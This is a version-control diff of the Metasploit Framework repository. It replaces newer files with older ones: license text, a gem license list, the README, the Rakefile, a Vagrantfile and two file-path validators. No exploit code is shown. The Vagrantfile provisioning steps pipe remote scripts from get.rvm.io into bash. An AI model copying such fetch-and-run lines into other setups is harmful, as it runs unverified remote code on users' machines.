-AUTHORIZED REPRESENTATIVE OR ANY CONTRIBUTOR SHALL CREATE A WARRANTY.
-You acknowledge that the Covered Code is not intended for use in the
-operation of nuclear facilities, aircraft navigation, communication
-systems, or air traffic control machines in which case the failure of
-the Covered Code could lead to death, personal injury, or severe
-physical or environmental damage.
-
-9. LIMITATION OF LIABILITY. TO THE EXTENT NOT PROHIBITED BY LAW, IN NO
-EVENT SHALL APPLE OR ANY CONTRIBUTOR BE LIABLE FOR ANY INCIDENTAL,
-SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES ARISING OUT OF OR RELATING
-TO THIS LICENSE OR YOUR USE OR INABILITY TO USE THE COVERED CODE, OR
-ANY PORTION THEREOF, WHETHER UNDER A THEORY OF CONTRACT, WARRANTY,
-TORT (INCLUDING NEGLIGENCE), PRODUCTS LIABILITY OR OTHERWISE, EVEN IF
-APPLE OR SUCH CONTRIBUTOR HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH
-DAMAGES AND NOTWITHSTANDING THE FAILURE OF ESSENTIAL PURPOSE OF ANY
-REMEDY. SOME JURISDICTIONS DO NOT ALLOW THE LIMITATION OF LIABILITY OF
-INCIDENTAL OR CONSEQUENTIAL DAMAGES, SO THIS LIMITATION MAY NOT APPLY
-TO YOU. In no event shall Apple's total liability to You for all
-damages (other than as may be required by applicable law) under this
-License exceed the amount of fifty dollars ($50.00).
-
-10. Trademarks. This License does not grant any rights to use the
-trademarks or trade names "Apple", "Apple Computer", "Mac", "Mac OS",
-"QuickTime", "QuickTime Streaming Server" or any other trademarks,
-service marks, logos or trade names belonging to Apple (collectively
-"Apple Marks") or to any trademark, service mark, logo or trade name
-belonging to any Contributor. You agree not to use any Apple Marks in
-or as part of the name of products derived from the Original Code or
-to endorse or promote products derived from the Original Code other
-than as expressly permitted by and in strict compliance at all times
-with Apple's third party trademark usage guidelines which are posted
-at http://www.apple.com/legal/guidelinesfor3rdparties.html.
-
-11. Ownership. Subject to the licenses granted under this License,
-each Contributor retains all rights, title and interest in and to any
-Modifications made by such Contributor. Apple retains all rights,
-title and interest in and to the Original Code and any Modifications
-made by or on behalf of Apple ("Apple Modifications"), and such Apple
-Modifications will not be automatically subject to this License. Apple
-may, at its sole discretion, choose to license such Apple
-Modifications under this License, or on different terms from those
-contained in this License or may choose not to license them at all.
-
-12. Termination.
-
-12.1 Termination. This License and the rights granted hereunder will
-terminate:
-
-(a) automatically without notice from Apple if You fail to comply with
-any term(s) of this License and fail to cure such breach within 30
-days of becoming aware of such breach;
-
-(b) immediately in the event of the circumstances described in Section
-13.5(b); or
-
-(c) automatically without notice from Apple if You, at any time during
-the term of this License, commence an action for patent infringement
-against Apple; provided that Apple did not first commence
-an action for patent infringement against You in that instance.
-
-12.2 Effect of Termination. Upon termination, You agree to immediately
-stop any further use, reproduction, modification, sublicensing and
-distribution of the Covered Code. All sublicenses to the Covered Code
-which have been properly granted prior to termination shall survive
-any termination of this License. Provisions which, by their nature,
-should remain in effect beyond the termination of this License shall
-survive, including but not limited to Sections 3, 5, 8, 9, 10, 11,
-12.2 and 13. No party will be liable to any other for compensation,
-indemnity or damages of any sort solely as a result of terminating
-this License in accordance with its terms, and termination of this
-License will be without prejudice to any other right or remedy of
-any party.
-
-13. Miscellaneous.
-
-13.1 Government End Users. The Covered Code is a "commercial item" as
-defined in FAR 2.101. Government software and technical data rights in
-the Covered Code include only those rights customarily provided to the
-public as defined in this License. This customary commercial license
-in technical data and software is provided in accordance with FAR
-12.211 (Technical Data) and 12.212 (Computer Software) and, for
-Department of Defense purchases, DFAR 252.227-7015 (Technical Data --
-Commercial Items) and 227.7202-3 (Rights in Commercial Computer
-Software or Computer Software Documentation). Accordingly, all U.S.
-Government End Users acquire Covered Code with only those rights set
-forth herein.
-
-13.2 Relationship of Parties. This License will not be construed as
-creating an agency, partnership, joint venture or any other form of
-legal association between or among You, Apple or any Contributor, and
-You will not represent to the contrary, whether expressly, by
-implication, appearance or otherwise.
-
-13.3 Independent Development. Nothing in this License will impair
-Apple's right to acquire, license, develop, have others develop for
-it, market and/or distribute technology or products that perform the
-same or similar functions as, or otherwise compete with,
-Modifications, Larger Works, technology or products that You may
-develop, produce, market or distribute.
-
-13.4 Waiver; Construction. Failure by Apple or any Contributor to
-enforce any provision of this License will not be deemed a waiver of
-future enforcement of that or any other provision. Any law or
-regulation which provides that the language of a contract shall be
-construed against the drafter will not apply to this License.
-
-13.5 Severability. (a) If for any reason a court of competent
-jurisdiction finds any provision of this License, or portion thereof,
-to be unenforceable, that provision of the License will be enforced to
-the maximum extent permissible so as to effect the economic benefits
-and intent of the parties, and the remainder of this License will
-continue in full force and effect. (b) Notwithstanding the foregoing,
-if applicable law prohibits or restricts You from fully and/or
-specifically complying with Sections 2 and/or 3 or prevents the
-enforceability of either of those Sections, this License will
-immediately terminate and You must immediately discontinue any use of
-the Covered Code and destroy all copies of it that are in your
-possession or control.
-
-13.6 Dispute Resolution. Any litigation or other dispute resolution
-between You and Apple relating to this License shall take place in the
-Northern District of California, and You and Apple hereby consent to
-the personal jurisdiction of, and venue in, the state and federal
-courts within that District with respect to this License. The
-application of the United Nations Convention on Contracts for the
-International Sale of Goods is expressly excluded.
-
-13.7 Entire Agreement; Governing Law. This License constitutes the
-entire agreement between the parties with respect to the subject
-matter hereof. This License shall be governed by the laws of the
-United States and the State of California, except that body of
-California law concerning conflicts of law.
-
-Where You are located in the province of Quebec, Canada, the following
-clause applies: The parties hereby confirm that they have requested
-that this License and all related documents be drafted in English. Les
-parties ont exige que le present contrat et tous les documents
-connexes soient rediges en anglais.
-
-EXHIBIT A.
-
-"Portions Copyright (c) 1999-2003 Apple Computer, Inc. All Rights
-Reserved.
-
-This file contains Original Code and/or Modifications of Original Code
-as defined in and that are subject to the Apple Public Source License
-Version 2.0 (the 'License'). You may not use this file except in
-compliance with the License. Please obtain a copy of the License at
-http://www.opensource.apple.com/apsl/ and read it before using this
-file.
-
-The Original Code and all software distributed under the License are
-distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
-EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
-INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
-FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
-Please see the License for the specific language governing rights and
-limitations under the License."
@@ -1,252 +1,130 @@
 This file is auto-generated by tools/dev/update_gem_licenses.sh
-Ascii85, 2.0.1, MIT
-aarch64, 2.1.0, "Apache 2.0"
-abbrev, 0.1.2, "ruby, Simplified BSD"
-actionpack, 7.2.2.2, MIT
-actionview, 7.2.2.2, MIT
-activemodel, 7.2.2.2, MIT
-activerecord, 7.2.2.2, MIT
-activesupport, 7.2.2.2, MIT
-addressable, 2.8.7, "Apache 2.0"
+Ascii85, 1.0.2, MIT
+actionpack, 4.2.9, MIT
+actionview, 4.2.9, MIT
+activemodel, 4.2.9, MIT
+activerecord, 4.2.9, MIT
+activesupport, 4.2.9, MIT
+addressable, 2.5.1, "Apache 2.0"
 afm, 0.2.2, MIT
-allure-rspec, 2.27.0, "Apache 2.0"
-allure-ruby-commons, 2.27.0, "Apache 2.0"
-arel-helpers, 2.16.0, MIT
-ast, 2.4.3, MIT
-aws-eventstream, 1.3.2, "Apache 2.0"
-aws-partitions, 1.1065.0, "Apache 2.0"
-aws-sdk-core, 3.220.1, "Apache 2.0"
-aws-sdk-ec2, 1.511.0, "Apache 2.0"
-aws-sdk-ec2instanceconnect, 1.55.0, "Apache 2.0"
-aws-sdk-iam, 1.119.0, "Apache 2.0"
-aws-sdk-kms, 1.99.0, "Apache 2.0"
-aws-sdk-s3, 1.182.0, "Apache 2.0"
-aws-sdk-ssm, 1.191.0, "Apache 2.0"
-aws-sigv4, 1.11.0, "Apache 2.0"
-base64, 0.3.0, "ruby, Simplified BSD"
-bcrypt, 3.1.20, MIT
-bcrypt_pbkdf, 1.1.1, MIT
-benchmark, 0.4.1, "ruby, Simplified BSD"
-bigdecimal, 3.3.1, "ruby, Simplified BSD"
-bindata, 2.4.15, "Simplified BSD"
-bootsnap, 1.18.4, MIT
-bson, 5.1.1, "Apache 2.0"
-builder, 3.3.0, MIT
-bundler, 2.5.22, MIT
-byebug, 12.0.0, "Simplified BSD"
-chunky_png, 1.4.0, MIT
-coderay, 1.1.3, MIT
-concurrent-ruby, 1.3.5, MIT
-connection_pool, 2.5.4, MIT
-cookiejar, 0.3.4, "Simplified BSD"
-crack, 1.0.1, MIT
-crass, 1.0.6, MIT
-csv, 3.3.2, "ruby, Simplified BSD"
-daemons, 1.4.1, MIT
-date, 3.4.1, "ruby, Simplified BSD"
-debug, 1.11.0, "ruby, Simplified BSD"
-diff-lcs, 1.6.2, "MIT, Artistic-1.0-Perl, GPL-2.0-or-later"
-dnsruby, 1.73.1, "Apache 2.0"
-docile, 1.4.1, MIT
-domain_name, 0.6.20240107, "Simplified BSD, New BSD, Mozilla Public License 2.0"
-drb, 2.2.3, "ruby, Simplified BSD"
-ed25519, 1.4.0, MIT
-elftools, 1.3.1, MIT
-em-http-request, 1.1.7, MIT
-em-socksify, 0.3.3, MIT
-erb, 5.0.3, "ruby, Simplified BSD"
-erubi, 1.13.1, MIT
-eventmachine, 1.2.7, "ruby, GPL-2.0"
-factory_bot, 6.5.5, MIT
-factory_bot_rails, 6.5.1, MIT
-faker, 3.5.1, MIT
-faraday, 2.7.11, MIT
-faraday-net_http, 3.0.2, MIT
-faraday-retry, 2.2.1, MIT
-faye-websocket, 0.11.3, "Apache 2.0"
-ffi, 1.16.3, "New BSD"
-fiddle, 1.1.6, "ruby, Simplified BSD"
-filesize, 0.2.0, MIT
-fivemat, 1.3.7, MIT
-forwardable, 1.3.3, "ruby, Simplified BSD"
-getoptlong, 0.2.1, "ruby, Simplified BSD"
-gssapi, 1.3.1, MIT
-gyoku, 1.4.0, MIT
-hashdiff, 1.2.1, MIT
+arel, 6.0.4, MIT
+arel-helpers, 2.4.0, unknown
+backports, 3.8.0, MIT
+bcrypt, 3.1.11, MIT
+bindata, 2.4.0, ruby
+bit-struct, 0.16, ruby
+builder, 3.2.3, MIT
+bundler, 1.15.1, MIT
+coderay, 1.1.1, MIT
+diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
+dnsruby, 1.60.1, "Apache 2.0"
+docile, 1.1.5, MIT
+erubis, 2.7.0, MIT
+factory_girl, 4.8.0, MIT
+factory_girl_rails, 4.8.0, MIT
+faraday, 0.12.1, MIT
+filesize, 0.1.1, MIT
+fivemat, 1.3.5, MIT
+google-protobuf, 3.3.0, "New BSD"
+googleauth, 0.5.1, "Apache 2.0"
+grpc, 1.4.1, "New BSD"
 hashery, 2.1.2, "Simplified BSD"
-hrr_rb_ssh, 0.4.2, "Apache 2.0"
-hrr_rb_ssh-ed25519, 0.4.2, "Apache 2.0"
-http-accept, 1.7.0, MIT
-http-cookie, 1.0.8, MIT
-http_parser.rb, 0.8.0, MIT
-httpclient, 2.9.0, ruby
-i18n, 1.14.7, MIT
-io-console, 0.8.1, "ruby, Simplified BSD"
-ipaddr, 1.2.7, "ruby, Simplified BSD"
-irb, 1.15.2, "ruby, Simplified BSD"
-jmespath, 1.6.2, "Apache 2.0"
+i18n, 0.8.6, MIT
 jsobfu, 0.4.2, "New BSD"
-json, 2.15.1, ruby
-json-schema, 6.2.0, MIT
-language_server-protocol, 3.17.0.5, MIT
-license_finder, 5.11.1, MIT
-lint_roller, 1.1.0, MIT
+json, 2.1.0, ruby
+jwt, 1.5.6, MIT
 little-plugger, 1.1.4, MIT
-logger, 1.7.0, "ruby, Simplified BSD"
-logging, 2.4.0, MIT
-loofah, 2.24.1, MIT
-lru_redux, 1.1.0, MIT
-mcp, 0.13.0, "Apache 2.0"
-memory_profiler, 1.1.0, MIT
-metasm, 1.0.5, LGPL-2.1
-metasploit-concern, 5.0.5, "New BSD"
-metasploit-credential, 6.0.23, "New BSD"
-metasploit-framework, 6.4.133, "New BSD"
-metasploit-model, 5.0.4, "New BSD"
-metasploit-payloads, 2.0.245, "3-clause (or ""modified"") BSD"
-metasploit_data_models, 6.0.18, "New BSD"
-metasploit_payloads-mettle, 1.0.46, "3-clause (or ""modified"") BSD"
-method_source, 1.1.0, MIT
-mime-types, 3.7.0, MIT
-mime-types-data, 3.2025.0924, MIT
-mini_portile2, 2.8.9, MIT
-minitest, 5.25.5, MIT
-mqtt, 0.7.0, MIT
-msgpack, 1.6.1, "Apache 2.0"
-multi_json, 1.15.0, MIT
-mustermann, 3.0.3, MIT
-mutex_m, 0.3.0, "ruby, Simplified BSD"
+logging, 2.2.2, MIT
+loofah, 2.0.3, MIT
+memoist, 0.16.0, MIT
+metasm, 1.0.3, LGPL
+metasploit-aggregator, 0.2.1, "New BSD"
+metasploit-concern, 2.0.5, "New BSD"
+metasploit-credential, 2.0.10, "New BSD"
+metasploit-framework, 4.15.0, "New BSD"
+metasploit-model, 2.0.4, "New BSD"
+metasploit-payloads, 1.2.37, "3-clause (or ""modified"") BSD"
+metasploit_data_models, 2.0.15, "New BSD"
+metasploit_payloads-mettle, 0.1.10, "3-clause (or ""modified"") BSD"
+method_source, 0.8.2, MIT
+mini_portile2, 2.2.0, MIT
+minitest, 5.10.2, MIT
+msgpack, 1.1.0, "Apache 2.0"
+multi_json, 1.12.1, MIT
+multipart-post, 2.0.0, MIT
 nessus_rest, 0.1.6, MIT
-net-imap, 0.5.6, "ruby, Simplified BSD"
-net-ldap, 0.19.0, MIT
-net-protocol, 0.2.2, "ruby, Simplified BSD"
-net-sftp, 4.0.0, MIT
-net-smtp, 0.5.1, "ruby, Simplified BSD"
-net-ssh, 7.3.0, MIT
-netrc, 0.11.0, MIT
-network_interface, 0.0.4, MIT
-nexpose, 7.3.0, "New BSD"
-nio4r, 2.7.4, "MIT, Simplified BSD"
-nokogiri, 1.18.10, MIT
-nori, 2.7.1, MIT
-octokit, 10.0.0, MIT
-openssl-ccm, 1.2.3, MIT
-openssl-cmac, 2.0.2, MIT
+net-ssh, 4.1.0, MIT
+network_interface, 0.0.1, MIT
+nexpose, 6.1.0, BSD
+nokogiri, 1.8.0, MIT
+octokit, 4.7.0, MIT
+openssl-ccm, 1.2.1, MIT
 openvas-omp, 0.0.4, MIT
-ostruct, 0.6.1, "ruby, Simplified BSD"
-packetfu, 2.0.0, "New BSD"
-parallel, 1.27.0, MIT
-parser, 3.3.9.0, MIT
-parslet, 1.8.2, MIT
+os, 0.9.6, MIT
+packetfu, 1.1.13, BSD
 patch_finder, 1.0.2, "New BSD"
-pcaprub, 0.13.3, LGPL-2.1
-pdf-reader, 2.14.1, MIT
-pg, 1.5.9, "Simplified BSD"
-pp, 0.6.3, "ruby, Simplified BSD"
-prettyprint, 0.2.0, "ruby, Simplified BSD"
-prism, 1.5.1, MIT
-pry, 0.15.2, MIT
-pry-byebug, 3.11.0, MIT
-psych, 5.2.6, MIT
-public_suffix, 6.0.2, MIT
-puma, 6.6.0, "New BSD"
-racc, 1.8.1, "ruby, Simplified BSD"
-rack, 2.2.19, MIT
-rack-protection, 3.2.0, MIT
-rack-session, 1.0.2, MIT
-rack-test, 2.2.0, MIT
-rackup, 1.0.1, MIT
-rails-dom-testing, 2.3.0, MIT
-rails-html-sanitizer, 1.6.2, MIT
-railties, 7.2.2.2, MIT
-rainbow, 3.1.1, MIT
-rake, 13.3.0, MIT
-rasn1, 0.14.0, MIT
-rb-readline, 0.5.5, BSD
-rdoc, 6.15.0, ruby
-recog, 3.1.14, unknown
-redcarpet, 3.6.1, MIT
-regexp_parser, 2.11.3, MIT
-reline, 0.6.2, ruby
-require_all, 3.0.0, MIT
-rest-client, 2.1.0, MIT
-rex-arch, 0.1.20, "New BSD"
-rex-bin_tools, 0.1.16, "New BSD"
-rex-core, 0.1.36, "New BSD"
-rex-encoder, 0.1.10, "New BSD"
-rex-exploitation, 0.1.44, "New BSD"
-rex-java, 0.1.8, "New BSD"
-rex-mime, 0.1.11, "New BSD"
-rex-nop, 0.1.4, "New BSD"
-rex-ole, 0.1.9, "New BSD"
-rex-powershell, 0.1.103, "New BSD"
-rex-random_identifier, 0.1.21, "New BSD"
-rex-registry, 0.1.6, "New BSD"
-rex-rop_builder, 0.1.6, "New BSD"
-rex-socket, 0.1.65, "New BSD"
-rex-sslscan, 0.1.13, "New BSD"
-rex-struct2, 0.1.5, "New BSD"
-rex-text, 0.2.63, "New BSD"
-rex-zip, 0.1.6, "New BSD"
-rexml, 3.4.1, "Simplified BSD"
-rinda, 0.2.0, "ruby, Simplified BSD"
+pcaprub, 0.12.4, LGPL-2.1
+pdf-reader, 2.0.0, MIT
+pg, 0.20.0, "New BSD"
+pg_array_parser, 0.0.9, unknown
+postgres_ext, 3.0.0, MIT
+pry, 0.10.4, MIT
+public_suffix, 2.0.5, MIT
+rack, 1.6.8, MIT
+rack-test, 0.6.3, MIT
+rails-deprecated_sanitizer, 1.0.3, MIT
+rails-dom-testing, 1.0.8, MIT
+rails-html-sanitizer, 1.0.3, MIT
+railties, 4.2.9, MIT
+rake, 12.0.0, MIT
+rb-readline, 0.5.4, BSD
+recog, 2.1.11, unknown
+redcarpet, 3.4.0, MIT
+rex-arch, 0.1.9, "New BSD"
+rex-bin_tools, 0.1.4, "New BSD"
+rex-core, 0.1.11, "New BSD"
+rex-encoder, 0.1.4, "New BSD"
+rex-exploitation, 0.1.15, "New BSD"
+rex-java, 0.1.5, "New BSD"
+rex-mime, 0.1.5, "New BSD"
+rex-nop, 0.1.1, "New BSD"
+rex-ole, 0.1.6, "New BSD"
+rex-powershell, 0.1.72, "New BSD"
+rex-random_identifier, 0.1.2, "New BSD"
+rex-registry, 0.1.3, "New BSD"
+rex-rop_builder, 0.1.3, "New BSD"
+rex-socket, 0.1.8, "New BSD"
+rex-sslscan, 0.1.4, "New BSD"
+rex-struct2, 0.1.2, "New BSD"
+rex-text, 0.2.15, "New BSD"
+rex-zip, 0.1.3, "New BSD"
 rkelly-remix, 0.0.7, MIT
-rspec, 3.13.1, MIT
-rspec-core, 3.13.5, MIT
-rspec-expectations, 3.13.5, MIT
-rspec-mocks, 3.13.5, MIT
-rspec-rails, 8.0.2, MIT
+robots, 0.10.1, MIT
+rspec, 3.6.0, MIT
+rspec-core, 3.6.0, MIT
+rspec-expectations, 3.6.0, MIT
+rspec-mocks, 3.6.0, MIT
+rspec-rails, 3.6.0, MIT
 rspec-rerun, 1.1.0, MIT
-rspec-support, 3.13.6, MIT
-rubocop, 1.75.7, MIT
-rubocop-ast, 1.47.1, MIT
-ruby-macho, 4.1.0, MIT
-ruby-mysql, 4.2.0, MIT
-ruby-prof, 1.7.2, "Simplified BSD"
-ruby-progressbar, 1.13.0, MIT
+rspec-support, 3.6.0, MIT
 ruby-rc4, 0.1.5, MIT
-ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
-ruby_smb, 3.3.17, "New BSD"
-rubyntlm, 0.6.5, MIT
-rubyzip, 2.4.1, "Simplified BSD"
-sawyer, 0.9.2, MIT
-securerandom, 0.4.1, "ruby, Simplified BSD"
-simplecov, 0.18.2, MIT
-simplecov-html, 0.13.1, MIT
-simpleidn, 0.2.3, MIT
-sinatra, 3.2.0, MIT
-sqlite3, 1.7.3, "New BSD"
-sshkey, 3.0.0, MIT
-stringio, 3.1.1, "ruby, Simplified BSD"
-strptime, 0.2.5, "Simplified BSD"
-swagger-blocks, 3.0.0, MIT
-syslog, 0.3.0, "ruby, Simplified BSD"
-test-prof, 1.4.4, MIT
-thin, 1.8.2, "GPL-2.0+, ruby"
-thor, 1.4.0, MIT
-tilt, 2.6.0, MIT
-timecop, 0.9.10, MIT
-timeout, 0.4.3, "ruby, Simplified BSD"
-toml, 0.2.0, MIT
-tsort, 0.2.0, "ruby, Simplified BSD"
-ttfunk, 1.8.0, "Nonstandard, GPL-2.0-only, GPL-3.0-only"
-tzinfo, 2.0.6, MIT
-tzinfo-data, 1.2025.1, MIT
-unicode-display_width, 3.2.0, MIT
-unicode-emoji, 4.1.0, MIT
-unix-crypt, 1.3.1, 0BSD
-useragent, 0.16.11, MIT
-warden, 1.2.9, MIT
-webmock, 3.26.2, MIT
-webrick, 1.9.1, "ruby, Simplified BSD"
-websocket-driver, 0.7.7, "Apache 2.0"
-websocket-extensions, 0.1.5, "Apache 2.0"
-win32api, 0.1.0, unknown
-windows_error, 0.1.5, BSD
-winrm, 2.3.9, "Apache 2.0"
-with_env, 1.1.0, MIT
-xdr, 3.0.3, "Apache 2.0"
-xml-simple, 1.1.9, MIT
-xmlrpc, 0.3.3, "ruby, Simplified BSD"
-yard, 0.9.37, MIT
-zeitwerk, 2.7.3, MIT
+ruby_smb, 0.0.18, "New BSD"
+rubyntlm, 0.6.2, MIT
+rubyzip, 1.2.1, "Simplified BSD"
+sawyer, 0.8.1, MIT
+signet, 0.7.3, "Apache 2.0"
+simplecov, 0.14.1, MIT
+simplecov-html, 0.10.1, MIT
+slop, 3.6.0, MIT
+sqlite3, 1.3.13, "New BSD"
+sshkey, 1.9.0, MIT
+thor, 0.19.4, MIT
+thread_safe, 0.3.6, "Apache 2.0"
+timecop, 0.9.1, MIT
+ttfunk, 1.5.1, "Nonstandard, GPL-2.0, GPL-3.0"
+tzinfo, 1.2.3, MIT
+tzinfo-data, 1.2017.2, MIT
+windows_error, 0.1.2, BSD
+xdr, 2.0.0, "Apache 2.0"
+xmlrpc, 0.3.0, ruby
+yard, 0.9.9, MIT
@@ -1,52 +1,49 @@
-# Metasploit Framework
+Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.svg?branch=master)](https://travis-ci.org/rapid7/metasploit-framework) [![Code Climate](https://img.shields.io/codeclimate/github/rapid7/metasploit-framework.svg)](https://codeclimate.com/github/rapid7/metasploit-framework) [![Docker Pulls](https://img.shields.io/docker/pulls/metasploitframework/metasploit-framework.svg)](https://hub.docker.com/r/metasploitframework/metasploit-framework/)
+==
+The Metasploit Framework is released under a BSD-style license. See
+COPYING for more details.

-The Metasploit Framework is an open-source tool released under a BSD-style license. For detailed licensing information, refer to the `COPYING` file.
+The latest version of this software is available from: https://metasploit.com

-## Latest Version
-Access the latest version of Metasploit from the [Nightly Installers](https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html) page.
+Bug tracking and development information can be found at:
+ https://github.com/rapid7/metasploit-framework

-## Documentation
-Comprehensive documentation, including usage guides, is available at [Metasploit Docs](https://docs.metasploit.com/).
+New bugs and feature requests should be directed to:
+  https://r-7.co/MSF-BUGv1

-## Development Environment
-To set up a development environment, visit the [Development Setup Guide](https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html).
+API documentation for writing modules can be found at:
+  https://rapid7.github.io/metasploit-framework/api

-## Bug and Feature Requests
-Submit bugs and feature requests via the [GitHub Issues](https://github.com/rapid7/metasploit-framework/issues) tracker. New submissions can be made through the [MSF-BUGv1 form](https://github.com/rapid7/metasploit-framework/issues/new/choose).
+Questions and suggestions can be sent to: Freenode IRC channel or e-mail the metasploit-hackers mailing list

-## API Documentation
-For information on writing modules, refer to the [API Documentation](https://docs.metasploit.com/api/).
+Installing
+--

-## Support and Communication
-For questions and suggestions, you can:
+Generally, you should use [the free installer](https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers),
+which contains all of the dependencies and will get you up and running with a
+few clicks. See the [Dev Environment Setup](https://r-7.co/MSF-DEV) if
+you'd like to deal with dependencies on your own.

- Join our [GitHub Discussions](https://github.com/rapid7/metasploit-framework/discussions) for community support and general questions
- Join the [Metasploit Slack](https://join.slack.com/t/metasploit/shared_invite/zt-30i688it0-mJsFGT44IMtdeZi1DraamQ) for real-time chat
- Submit [GitHub Issues](https://github.com/rapid7/metasploit-framework/issues) for bug reports and feature requests
- Follow [@metasploit](https://x.com/metasploit) on X or [@metasploit@infosec.exchange](https://infosec.exchange/@metasploit) on Mastodon for updates
+Using Metasploit
+--
+Metasploit can do all sorts of things. The first thing you'll want to do
+is start `msfconsole`, but after that, you'll probably be best served by
+reading [Metasploit Unleashed][unleashed], the [great community
+resources](https://metasploit.github.io), or the [wiki].

-**Note:** Some community members may still use IRC channels and the metasploit-hackers mailing list, though the primary support channels are now GitHub Discussions and Slack.
+Contributing
+--
+See the [Dev Environment Setup][wiki-devenv] guide on GitHub, which will
+walk you through the whole process from installing all the
+dependencies, to cloning the repository, and finally to submitting a
+pull request. For slightly more information, see
+[Contributing](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md).

-## Installing Metasploit

-### Recommended Installation
+[wiki]: https://github.com/rapid7/metasploit-framework/wiki
+[wiki-devenv]: https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment "Metasploit Development Environment Setup"
+[wiki-start]: https://github.com/rapid7/metasploit-framework/wiki/ "Metasploit Wiki"
+[wiki-usage]: https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit "Using Metasploit"
+[unleashed]: https://www.offensive-security.com/metasploit-unleashed/ "Metasploit Unleashed"

-We recommend installation with the [official Metasploit installers](https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html#installing-metasploit-on-linux--macos) on Linux or macOS. Metasploit is also pre-installed with Kali.

-For a manual setup, consult the [Dev Environment Setup](https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html) guide.
-
-## Using Metasploit
-
-To get started with Metasploit:
-
-1. **Start `msfconsole`:** This is the primary interface for interacting with Metasploit.
-2. **Explore Resources:** 
-   - Visit the [Using Metasploit](https://docs.metasploit.com/docs/using-metasploit/getting-started/index.html) section of the documentation.
-
-## Contributing
-
-To contribute to Metasploit:
-
-1. **Setup Development Environment:** Follow the instructions in the [Development Setup Guide](https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html) on GitHub.
-2. **Clone the Repository:** Obtain the source code from the official repository.
-3. **Submit a Pull Request:** After making changes, submit a pull request for review. Additional details can be found in the [Contributing Guide](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md).
@@ -1,6 +1,5 @@
 #!/usr/bin/env rake
 require File.expand_path('../config/application', __FILE__)
-require 'msfenv'
 require 'metasploit/framework/require'
 require 'metasploit/framework/spec/untested_payloads'

@@ -1,23 +1,17 @@
 # -*- mode: ruby -*-
 # vi: set ft=ruby :

-display_name = "metasploit-framework"
-
 Vagrant.configure(2) do |config|
  config.ssh.forward_x11 = true
-  config.vm.box = "hashicorp/bionic64" # https://app.vagrantup.com/hashicorp/boxes/bionic64
+  config.vm.box = "ubuntu/xenial64"
  config.vm.network :forwarded_port, guest: 4444, host: 4444
-  config.vm.provider "vmware_desktop" do |v|
+  config.vm.provider "vmware" do |v|
 	  v.memory = 2048
 	  v.cpus = 2
-    v.vmx['displayname'] = display_name
-    #v.gui = true # uncomment to show VM in your hypervisor's GUI
  end
  config.vm.provider "virtualbox" do |v|
-    v.name = display_name
 	  v.memory = 2048
 	  v.cpus = 2
-    #v.gui = true # uncomment to show VM in your hypervisor's GUI
  end
  %w(.vimrc .gitconfig).each do |f|
    local = File.expand_path "~/#{f}"
@@ -34,16 +28,12 @@ Vagrant.configure(2) do |config|
    config.vm.provision "shell", inline: step
  end

-  [ # use the rvm install method used in omnibus install
-    # only show stderr when gpg really fails. avoids superfluous stderr from gpg
-    'out=`curl -sSL https://rvm.io/mpapis.asc | gpg --import - 2>&1` && echo "imported mpapis.asc" || echo $out 1>&2',
-    'out=`curl -sSL https://rvm.io/pkuczynski.asc | gpg --import - 2>&1` && echo "imported pkuczynski.asc" || echo $out 1>&2',
-    'out=`curl -L -sSL https://get.rvm.io | bash -s stable 2>&1` && echo "rvm installed" || echo $out 1>&2',
-    # only install Ruby if the right version isn't already present
-    "echo 'Installing Ruby if necessary'",
-    'cd /vagrant && rv=`cat .ruby-version` && source ~/.rvm/scripts/rvm && rvm list strings | grep -q $rv || rvm install $rv',
-    'source ~/.rvm/scripts/rvm && cd /vagrant && gem install --quiet bundler && bundle',
-    'mkdir -p ~/.msf4',
+  [ "gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3",
+    "curl -L https://get.rvm.io | bash -s stable",
+    "source ~/.rvm/scripts/rvm && cd /vagrant && rvm install `cat .ruby-version`",
+    "source ~/.rvm/scripts/rvm && cd /vagrant && gem install bundler",
+    "source ~/.rvm/scripts/rvm && cd /vagrant && bundle",
+    "mkdir -p ~/.msf4",
  ].each do |step|
    config.vm.provision "shell", privileged: false, inline: step
  end
@@ -1 +0,0 @@
-This directory contains ActiveRecord concerns, models and validators.
@@ -1,5 +0,0 @@
-class ApplicationRecord < ActiveRecord::Base
-  self.abstract_class = true
-  include ArelHelpers::ArelTable
-  include ArelHelpers::JoinAssociation
-end
@@ -7,7 +7,7 @@ module Metasploit

      def validate_each(record, attribute, value)
        unless ::File.executable? value
-          record.errors.add(attribute, (options[:message] || "is not a valid path to an executable file"))
+          record.errors[attribute] << (options[:message] || "is not a valid path to an executable file")
        end
      end
    end
@@ -6,8 +6,8 @@ module Metasploit
    class FilePathValidator < ActiveModel::EachValidator

      def validate_each(record, attribute, value)
-        unless value && ::File.file?(value)
-          record.errors.add(attribute, (options[:message] || "is not a valid path to a regular file"))
+        unless ::File.file? value
+          record.errors[attribute] << (options[:message] || "is not a valid path to a regular file")
        end
      end
    end
@@ -1,3 +0,0 @@
-Contains various files that help configure Metasploit. Most files here you'll never have to deal with, though
-`database.yml.example` might be useful for those looking to configure their database, and `openssl.conf`
-might be helpful for those trying to troubleshoot OpenSSL issues in Metasploit.
@@ -1,29 +1,6 @@
-require 'fiddle'
